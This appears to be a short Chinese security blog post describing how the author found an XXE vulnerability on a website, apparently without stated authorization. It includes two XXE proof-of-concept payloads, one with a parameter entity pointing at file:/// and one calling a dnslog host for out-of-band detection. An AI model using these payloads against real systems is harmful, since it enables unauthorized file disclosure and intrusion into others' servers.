您的位置 首页 网络安全

一次简单的XXE漏洞挖掘

大晚上AG丢的一个站,又可以水一篇 一开始的时候我以为有弱口令,边扫我边用手和纸在打气 手都快肿了,放弃弱口令…

大晚上AG丢的一个站,又可以水一篇

一开始的时候我以为有弱口令,边扫我边用手和纸在打气

手都快肿了,放弃弱口令,柳暗花明又一村,返回的时候发现一处xml传输

返回xml语句

如何简单判断呢,先输入个<root>标签

很明显,服务器希望收到<root></root>

十之八九是存在了

现在我们在进一步确认

poc:

组成一个内部声明DTD,这里直接不需要声明xml

<!DOCTYPE root [
<!ENTITY % remote SYSTEM "file:///">
%remote;]>


<!DOCTYPE 根元素

<!ENTITY 实体名称

dnslog

<!DOCTYPE root [
<!ENTITY % remote SYSTEM "dnslog">
%remote;]>

下班

本文来自网络,不代表F12sec立场,转载请注明出处:http://www.0dayhack.net/index.php/1008/
小小小月球

作者: 小小小月球

发表评论

您的电子邮箱地址不会被公开。 必填项已用*标注

CAPTCHAis initialing...

评论列表(3)

联系我们

联系我们

QQ群:884338047

在线咨询: QQ交谈

邮箱: 2676666667@qq.com

工作时间:周一至周五,9:00-17:30,节假日休息

关注微信
微信扫一扫关注我们

微信扫一扫关注我们

关注微博
返回顶部